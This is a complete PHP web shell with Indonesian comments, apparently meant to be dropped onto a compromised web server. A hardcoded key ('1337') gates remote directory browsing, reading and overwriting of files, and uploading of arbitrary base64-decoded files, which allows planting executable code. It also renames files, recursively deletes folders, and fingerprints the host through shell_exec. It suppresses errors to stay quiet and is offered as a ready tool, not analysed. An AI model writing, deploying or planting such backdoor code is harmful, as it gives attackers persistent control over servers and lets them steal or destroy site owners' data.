<?php
header('Content-Type: application/json; charset=utf-8');
error_reporting(0);
ini_set('display_errors', 0);

// Hanya izinkan POST
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    exit;
}

// Key wajib
if (!isset($_POST['key']) || $_POST['key'] !== '1337') {
    echo json_encode([
        'status'  => 'error',
        'message' => 'Key salah. Pakai key=1337'
    ], JSON_PRETTY_PRINT);
    exit;
}

$is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';

$base_path = rtrim($_SERVER['DOCUMENT_ROOT'] ?? dirname(__FILE__), '/\\');
if (empty($base_path) || !is_dir($base_path)) {
    $base_path = getcwd();
}

$target_dir = $base_path;

// Deteksi mode filemanager
$is_filemanager_mode = isset($_POST['filemanager']);

// Proses path jika ada
if ($is_filemanager_mode && trim($_POST['filemanager'] ?? '') !== '') {
    $req_path = trim($_POST['filemanager']);
    $req_path = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $req_path);
    $req_path = rtrim($req_path, DIRECTORY_SEPARATOR);

    if ($is_windows && preg_match('/^[a-z]:[\/\\\\]/i', $req_path)) {
        $full_path = realpath($req_path) ?: $req_path;
    } else {
        $full_path = realpath($target_dir . DIRECTORY_SEPARATOR . $req_path) ?: ($target_dir . DIRECTORY_SEPARATOR . $req_path);
    }

    if (is_dir($full_path)) {
        $target_dir = $full_path;
    } else {
        $response['path_error'] = 'Folder tidak ditemukan: ' . $req_path;
    }
}

$response = [
    'status'        => 'ok',
    'document_root' => $base_path,
    'current_path'  => $target_dir,
];

// Fungsi hapus folder beserta isi secara rekursif
function rmdir_recursive($dir) {
    if (!is_dir($dir)) return false;
    $files = array_diff(scandir($dir), ['.', '..']);
    foreach ($files as $file) {
        $path = $dir . DIRECTORY_SEPARATOR . $file;
        is_dir($path) ? rmdir_recursive($path) : @unlink($path);
    }
    return @rmdir($dir);
}

// =============================================
// MODE DELETE (file atau folder)
// =============================================
if (isset($_POST['delete']) && !empty($_POST['file'])) {
    $name = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['file'])));
    $path = $target_dir . DIRECTORY_SEPARATOR . $name;
    $type = (isset($_POST['type']) && $_POST['type'] === 'folder') ? 'folder' : 'file';

    if (!file_exists($path)) {
        $response['error'] = 'Target tidak ditemukan';
    } elseif ($type === 'file') {
        if (is_file($path) && is_writable($path) && @unlink($path)) {
            $response['mode']         = 'delete_file';
            $response['deleted']      = $name;
            $response['delete_status'] = 'success';
        } else {
            $response['delete_status'] = 'failed';
            $response['error'] = 'Gagal hapus file (bukan file, permission, atau sedang digunakan)';
        }
    } elseif ($type === 'folder') {
        if (is_dir($path) && rmdir_recursive($path)) {
            $response['mode']         = 'delete_folder';
            $response['deleted']      = $name;
            $response['delete_status'] = 'success';
        } else {
            $response['delete_status'] = 'failed';
            $response['error'] = 'Gagal hapus folder (permission, folder tidak kosong, atau sedang digunakan)';
        }
    }
}

// =============================================
// MODE RENAME (file atau folder)
// =============================================
elseif (isset($_POST['rename']) && !empty($_POST['old_name']) && !empty($_POST['new_name'])) {
    $old_name = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['old_name'])));
    $new_name = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['new_name'])));

    $old_path = $target_dir . DIRECTORY_SEPARATOR . $old_name;
    $new_path = $target_dir . DIRECTORY_SEPARATOR . $new_name;
    $type = (isset($_POST['type']) && $_POST['type'] === 'folder') ? 'folder' : 'file';

    if (!file_exists($old_path)) {
        $response['error'] = 'Target lama tidak ditemukan';
    } elseif (file_exists($new_path)) {
        $response['error'] = 'Nama baru sudah digunakan';
    } elseif ($type === 'file' && is_file($old_path) && @rename($old_path, $new_path)) {
        $response['mode']         = 'rename_file';
        $response['old_name']     = $old_name;
        $response['new_name']     = $new_name;
        $response['rename_status'] = 'success';
    } elseif ($type === 'folder' && is_dir($old_path) && @rename($old_path, $new_path)) {
        $response['mode']         = 'rename_folder';
        $response['old_name']     = $old_name;
        $response['new_name']     = $new_name;
        $response['rename_status'] = 'success';
    } else {
        $response['rename_status'] = 'failed';
        $response['error'] = 'Gagal rename (permission denied atau tipe tidak sesuai)';
    }
}

// =============================================
// MODE UPLOAD
// =============================================
elseif (!empty($_POST['uploads']) && !empty($_POST['edit'])) {
    $upload_filename = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['uploads'])));
    $upload_filepath = $target_dir . DIRECTORY_SEPARATOR . $upload_filename;

    $new_content = base64_decode(trim($_POST['edit']), true);

    if ($new_content === false) {
        $response['error'] = 'Base64 decode gagal untuk upload';
    } else {
        if (!is_dir($target_dir)) {
            @mkdir($target_dir, 0777, true);
        }

        $bytes_written = @file_put_contents($upload_filepath, $new_content);

        if ($bytes_written !== false) {
            $response['mode']              = 'upload_file';
            $response['uploaded_file']     = $upload_filename;
            $response['upload_status']     = 'success';
            $response['uploaded_size']     = $bytes_written;
            $response['preview']           = substr($new_content, 0, 200) . (strlen($new_content) > 200 ? '...' : '');
        } else {
            $response['upload_status']     = 'failed';
            $response['error']             = 'Gagal menulis file';
        }
    }
}

// EDIT file
elseif (!empty($_POST['edit']) && !empty($_POST['read'])) {
    $filename = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['read'])));
    $filepath = $target_dir . DIRECTORY_SEPARATOR . $filename;

    if (file_exists($filepath) && is_file($filepath) && is_writable($filepath)) {
        $new_content = base64_decode(trim($_POST['edit']), true);
        if ($new_content !== false) {
            $bytes_written = @file_put_contents($filepath, $new_content);
            if ($bytes_written !== false) {
                $response['mode']           = 'edit_file';
                $response['edited_file']    = $filename;
                $response['edit_status']    = 'success';
                $response['new_size_bytes'] = $bytes_written;
                $response['preview']        = substr($new_content, 0, 200) . (strlen($new_content) > 200 ? '...' : '');
            } else {
                $response['edit_status'] = 'failed';
                $response['error'] = 'Gagal menulis file';
            }
        } else {
            $response['error'] = 'Base64 decode gagal';
        }
    } else {
        $response['error'] = 'File tidak valid atau tidak writable';
    }
}

// READ file
elseif (!empty($_POST['read'])) {
    $filename = basename(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, trim($_POST['read'])));
    $filepath = $target_dir . DIRECTORY_SEPARATOR . $filename;

    if (file_exists($filepath) && is_file($filepath) && is_readable($filepath)) {
        $mime = mime_content_type($filepath) ?: 'application/octet-stream';
        $size = filesize($filepath);

        $allowed_mimes = [
            'text/plain', 'text/html', 'text/css', 'text/javascript',
            'application/json', 'application/xml', 'application/javascript',
            'application/x-php', 'text/x-php', 'application/octet-stream'
        ];

        if ((strpos($mime, 'text/') === 0 || in_array($mime, $allowed_mimes)) && $size <= 1048576) {
            $content = @file_get_contents($filepath);
            if ($content !== false) {
                $response['mode']       = 'read_file';
                $response['read_file']  = $filename;
                $response['mime_type']  = $mime;
                $response['size_bytes'] = $size;
                $response['content']    = $content;
            } else {
                $response['error'] = 'Gagal membaca isi file';
            }
        } else {
            $response['error'] = 'File bukan tipe teks yang diizinkan atau terlalu besar';
            $response['mime_detected'] = $mime;
            $response['size_bytes']    = $size;
        }
    } else {
        $response['error'] = 'File tidak ditemukan atau tidak bisa dibaca';
    }
}

// Filemanager atau system info
else {
    if ($is_filemanager_mode) {
        $response['mode'] = 'filemanager';

        $files = [];
        if (is_dir($target_dir) && $dh = @opendir($target_dir)) {
            while (($entry = readdir($dh)) !== false) {
                if ($entry === '.' || $entry === '..') continue;

                $full = $target_dir . DIRECTORY_SEPARATOR . $entry;
                $is_dir = is_dir($full);
                $size_raw = $is_dir ? '-' : @filesize($full);
                $size_str = $is_dir ? '[DIR]' : ($size_raw !== false ? format_size($size_raw) : '?');

                $perms = @fileperms($full);
                $perms_str = $perms !== false ? substr(sprintf('%o', $perms), -4) : '?';

                $files[] = [
                    'name'     => $entry,
                    'type'     => $is_dir ? 'dir' : 'file',
                    'size'     => $size_str,
                    'perms'    => $perms_str,
                    'modified' => @date('Y-m-d H:i:s', @filemtime($full)) ?: '?'
                ];
            }
            closedir($dh);

            usort($files, function($a, $b) {
                if ($a['type'] === $b['type']) return strnatcasecmp($a['name'], $b['name']);
                return $a['type'] === 'dir' ? -1 : 1;
            });
        }

        $response['files'] = $files ?: ['error' => 'Tidak bisa membaca direktori'];
    } else {
        $response['mode'] = 'system_info';

        if ($is_windows) {
            $system_info = trim(@shell_exec('systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 2>&1') ?: 'Tidak bisa ambil info');
            $current_dir = trim(@shell_exec('cd') ?: $target_dir);
        } else {
            $system_info = trim(@shell_exec('uname -a 2>&1') ?: 'Tidak bisa ambil info');
            $current_dir = trim(@shell_exec('pwd 2>&1') ?: $target_dir);
        }

        $phpver = trim(@shell_exec('php --version 2>&1') ?: phpversion());

        $response['system_info'] = $system_info;
        $response['php_version'] = $phpver;
        $response['current_dir'] = $current_dir;
    }
}

function format_size($bytes) {
    if ($bytes < 1024) return $bytes . ' B';
    $units = ['KB','MB','GB','TB'];
    for ($i = 0; $bytes >= 1024 && $i < 3; $i++) $bytes /= 1024;
    return round($bytes, 1) . ' ' . $units[$i];
}

echo json_encode($response, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE);
